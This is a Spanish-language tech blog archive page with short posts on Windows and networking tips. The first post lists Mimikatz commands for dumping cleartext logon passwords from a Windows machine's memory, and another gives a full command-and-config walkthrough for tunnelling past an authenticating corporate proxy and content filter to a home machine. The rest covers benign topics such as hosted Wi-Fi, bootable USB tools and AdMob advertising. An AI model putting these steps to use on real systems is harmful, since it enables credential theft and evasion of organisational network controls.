martes, 18 de junio de 2013

Volcar Passwords en cache Windows con Mimikatz 2.0

La herramienta se puede descargar de: http://blog.gentilkiwi.com/mimikatz

En versiones anteriores el procedimiento era:
privilege::debug
inject::process lsass.exe sekurlsa.dll
@getLogonPasswords

Pero ahora ya no hace falta inyectar la DLL, de hecho da el siguiente error:

========================================
Les fonctions suivantes NE SONT PLUS supportées via l'injection de la librairie
sekurlsa.dll :

        @getLogonPasswords     @getMSV(Functions)     @getTsPkg(Functions)
        @getWDigest(Functions) @getLiveSSP(Functions) @getKerberos(Functions)

Les mêmes fonctionnalités (et même plus !) sont disponibles SANS INJECTION :

        sekurlsa::logonPasswords sekurlsa::msv     sekurlsa::tspkg
        sekurlsa::wdigest        sekurlsa::livessp sekurlsa::kerberos

Vous pouvez décharger la librairie avec    : @
Puis utiliser un module local, par exemple : sekurlsa::logonPasswords full
========================================

Por tanto, ahora es:
privilege::debug
sekurlsa::logonPasswords full


Con esto obtenemos las contraseñas (en claro) de los usuarios que se han logado en la máquina desde que la ha sido arrancada (porque están en memoria), pero no de todos los  usuarios que se han logado alguna vez en la máquina.


Happy Dumping ;)

No hay comentarios:

miércoles, 10 de octubre de 2012

Crear un AP en W7 o Windows Vista

Con un CMD con permisos de administrador creamos el interfaz:

netsh wlan set hostednetwork mode=allow ssid=wlan_xx key=mi.password.wifi

(esto nos crea un nuevo interfaz que pone .... wlan_xx)

Vamos a las propiedades del adaptador de la LAN y compartimos la conexión (allow y allow en sharing), en el nombre elegimos la wlan_xx

 Y por último lo arrancamos:
netsh wlan start hostednetwork

Para parar:
netsh wlan stop hostednetwork






No hay comentarios:

lunes, 1 de octubre de 2012

Cómo evitar o Evadir proxys corporativos (control de contenidos, etc)

Es muy habitual en las empresas, universidades, etc que se instalen gestores de control de contenido, para evitar que navegemos por sitios "inapropiados" (hack, virus, páginas de adultos, etc). estos medios no son infalibles y a menudo existen formas de eludirlos, por ejemplo la que voy a explicar.

Vamos a suponer uno de los escenarios mas restrictivos, tenemos un proxy ISA que exige autenticación de usuario y además sólo permite Kerberos y NTLM.

Necesitaremos un Ordenador que esté en internet (nuestro), y abramos algun puerto. Este esquema nos permitirá cierto nivel de anonimato (hasta este ordenador claro) ya que haremos SSL entre los extremos de la comunicación. El esquema en detalle sería:

PC Corporativo <=> Proxy ISA Corporativo <=> Internet <=> Pc en casa

Elementos que estarán en el PC Corporativo:

Firefox con ProxyProxy => Proxy Socks conectado a Proxy SSL => Proxy SSL conectado a Proxy NTLM => Proxy NTLM conectado a Proxy corporativo (con DOMINIO\usuario y password)


Elementos de nuestro PC conectado a Internet (en casa mipc.dyndns.org):
ProxySSL => SSH => Proxy Socks

(En este caso en lugar de un PC se empleará un WRT54G de Linksys (ahora Cisco), cuya ip interna por ejemplo será 10.0.0.1 que permite la instalación de todo lo necesario y no consume apenas energía).


Configuración de cada elemento en el PC corporativo:

 Foxy Proxy: proxy SOCKS v.5 en localhost:1080
Proxy Socks: Emplearemos el cliente SSH para crear un tunel SSH y dejar un puerto en escucha conectado al proxy Socks del pc en casa, el comando será:
ssh -C root@localhost -p 22000 -L 1080:IP_LOCAL_INTERNA:1080

El puerto 22000 será el puerto en el que se queda el servidor ProxySSL escuchando (en el punto siguiente). 1080 es típicamente el puerto socks, pero podemos usar otro. Hemos de conocer la IP_LOCAL_INTERNA del router linksys que tengamos en casa, ya que aqui es necesaria).

Proxy SSL: Hará de intermediario entre el proxy local NTLM y SSH para negociar el SSL con el destino, el comando será:

proxytunnel -q -a 22000 -p localhost:3129 -e -d mipc.dyndns.org.com:8443 -H "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)"


localhost:3129 correspone con los valores que pondremos en el punto siguiente, mipc.dyndns.org es nuestro PC de casa o el linksys en nuestro caso (con el puerto 8443 nateado).
Proxy NTLM: Nos autenticará en NTLM con el proxy corporativo y será al que se conecta el proxy SSL, el comando será:
cntlm.exe -a NTLMv2 -u USUARIO@DOMINIO -I -l localhost:3129 PROXY:80 

El puerto 3129 puede ser cualquier otro local libre, proxy es el nombre del proxy real que tengamos en la empresa y el 80 es el puerto.

Configuración de cada elemento en el PC de casa:

En el router nateamos el puerto 8443 (por ejemplo, ya que es un puerto que los proxys corporativos suelen permitir, pero si no lo permitiera nateamos el 443 que seguro que está permitido) a la IP del WRT54G (10.0.0.1)

En el WRT54G configuramos el SSL (/etc/stunnel/stunnel.conf):
[ssh-alt]  (esto es una etiqueta, puede ser cualquier cosa)
accept  = 8443
connect = 22
TIMEOUTclose = 0
El SSH no requiere de ninguna configuración especial

Configuramos el proxy Socks (/etc/srelay.conf):
# allow local subnet to access socks proxy
Rango_IP/24 any -

Si todo ha ido bien, desde el firefox con foxy proxy del pc corporativo si vamos a www.cualesmiip.com veremos la ip publica de nuestra casa (y no la pública de la empresa) si es así, es que todo ha funcioando bien.

Es posible que la conexión se corte en pocos segundos de inactividad (60 o tal vez menos), es debido a que el proxy corporativo corta las conexiones que no tienen tráfico en un tiempo, podemos lanzar un script como este para evitar el corte (ya que el script pone la hora cada  N segundos en la shell que dejamos conectada):

if [ '$1'=='' ]
then
   tiempo=10
else
   tiempo=$1
fi
while true
do
echo -------------------
date
sleep $tiempo
done
No hay comentarios:

sábado, 15 de septiembre de 2012

Crear un USB arrancable de Windows 7

Además de un DVD o imagen iso de Windows 7 necesitamos "A bootable USB":
http://www.askvg.com/a-bootable-usb-utility-to-create-bootable-usb-drive-to-install-windows-vista-server-2008-and-7/

http://www.deviantart.com/download/155238367/A_Bootable_USB_by_Vishal_Gupta.zip
No hay comentarios:

Botones de copiar, cortar y pegar en Windows 7

Classic Shell:
http://www.askvg.com/classic-shell-get-classic-start-menu-and-explorer-toolbar-buttons-cut-copy-paste-etc-back-in-windows-vista-and-7/

http://sourceforge.net/projects/classicshell/files/latest/download

No hay comentarios:

domingo, 9 de septiembre de 2012

Herramienta para ver el Hardware del PC

Piriform Speecy :
http://www.piriform.com/speccy

En Windows XP Sp3 da error: "no puede inicializarse CPU DLL", para solucionarlo:
PC Wizard funciona bien: http://www.cpuid.com/softwares/pc-wizard.html

No hay comentarios:

viernes, 24 de agosto de 2012

Herramientas para conocer el uso de la Red

Networkx, para ver el tráfico acumulado (histórico) de la red (todos los interfaces). http://www.softperfect.com/products/networx/manual/?lang=Spanish

Para ver el trafico en tiempo real: Yale. http://thesz.diecru.eu/content/yale.php
No hay comentarios:

lunes, 13 de agosto de 2012

Herramientas de Administración para Windows 7 SP1

Editor ADSI, DHCP, DNS, PKIView....

http://www.microsoft.com/es-es/download/details.aspx?id=7887
No hay comentarios:

Herramienta para crear USB a partir de distribuciones linux

Linux Live USB Creator (LiLi USB Creator):

Permite crear la versión USB (autoarrancable, y live) a partir de la imagen iso de cualquiera de estas distribuciones:
  • BackTrack  
  • OpenSuse
  • *Ubuntu
  • Red Hat Enterprise
  • Gentoo
  • Debian
  • Fedora Core
  • Etc...
Incluso la descarga directamente el propio programa en muchos casos.

http://www.linuxliveusb.com/


No hay comentarios:
Etiquetas:

jueves, 12 de abril de 2012

Google Admob - Cómo monetizar una aplicación móvil

Muchos de nosotros ya estamos acostumbrados a navegar por internet y ver "banners" en las páginas, pero es algo relativamente reciente verlos también en aplicaciones para móviles. Las plataformas mas grandes para la publicidad en Web son Adwords para anunciantes y Adsense para generar ingresos por nuestra web (ambas de Google). Para móviles es Admob (adquirida por Google en marzo de 2010).

Algunos conceptos que conviene conocer en el mundo de la publicidad en aplicaciones o web son los siguientes:

  • Solicitudes: número de veces que la aplicación o el sitio solicita que se muestre un anuncio.
  • Impresiones: número de veces que se muestran anuncios en la aplicación o en el sitio.
  • Impresiones de intercambio: número de veces que se muestran anuncios de intercambio en la aplicación o en el sitio mediante el intercambio de descargas. Este intercambio permite aumentar el reconocimiento e impulsar descargas de su aplicación para iPhone mediante el intercambio de sus anuncios de aplicación con los de otros desarrolladores. Para obtener más información al respecto, consulte Intercambio de descargas.
  • Porcentaje de relleno: número de veces que los anuncios se muestran en su aplicación o sitio, dividido entre el número de veces que su aplicación o sitio solicita que se muestre un anuncio.
  • Clics: número total de veces que los usuarios han hecho clic en los anuncios mostrados en su aplicación o sitio.
  • CTR (porcentaje de clics): número de veces que se ha hecho clic en los anuncios de su aplicación o sitio dividido entre el número de veces que los anuncios se han mostrado en su aplicación o sitio. Por ejemplo, si muestra un anuncio en su aplicación o sitio 1.000 veces y recibe 11 clics, el CTR es 1,1%.
  • eCPM (coste por cada mil impresiones efectivo): es una indicación de los ingresos de desarrolladores o editores por cada mil impresiones de anuncio. eCPM se calcula del siguiente modo: (ingresos totales / impresiones) x 1000. Por ejemplo, si los ingresos totales son 10 USD y las impresiones son 9.000, el eCPM es 1,11 USD.
  • Ingreso: cantidad de dinero que se obtiene de los sitios o aplicaciones.



    • ¿Cómo funciona Adsense?
    Pues Google tiene un completo sistema para crear campañas de anuncios que el webmaster integra en su web, blog, etc. y recibirá ingresos por impacto (visualización del banner) y click..

    Con AdSense los anuncios que verá en el sitio serán de coste por clic (CPC) o de coste por cada mil impresiones (CPM). En el caso de anuncios de CPC, se obtendrán ingresos cuando los usuarios hagan clic en los anuncios. En los anuncios de CPM, registrará ingresos cada vez que el anuncio se muestre a un usuario de su sitio.

    ¿Cómo funciona Admob?
    Pues Admob integra en un sólo producto lo que sería Adsense y AdWords para web, es decir, podemos anunciar nuestra aplicación en otras (con un coste para nostros), creando campañas publicitarias al estilo de AdWords o podemos anunciar otras aplicaciones en la nuestra (lo que nos da unos ingresos) al estilo de Adsense (con banners). A partir del 1 de mayo de 2012 Google unificará Admob en Adsense (por el momento no parece que Adsense y Adwors se vayan a unir a si que posiblemente para editores de aplicaciones para móviles que tengan tanto campañas como anuncios les complicará un poco la migración, pero tiempo al tiempo).

    Admob tiene algunas diferencias, ya que por ejemplo no se puede poner mas de un anuncio por pantalla (lo cual es razonable, ya que la pantalla de un movil no es tan grande como una página web que además casi siempre tiene scroll). Por otro lado parece que presenta otra diferencia sustancial y es que no se paga por impresiones sino sólo por click.

    Por tanto si una aplicación gratuita (o una web) os gusta no dudéis en pulsar su publicidad ya que es la mejor forma de indicar (y agradecer) al programador o webmaster que nos gusta, nos es útil y nos gustaría continuar teniendo gratis dicha aplicación o sitio web.

    2 comentarios:
    Etiquetas: , , ,
    Suscribirse a: Entradas (Atom)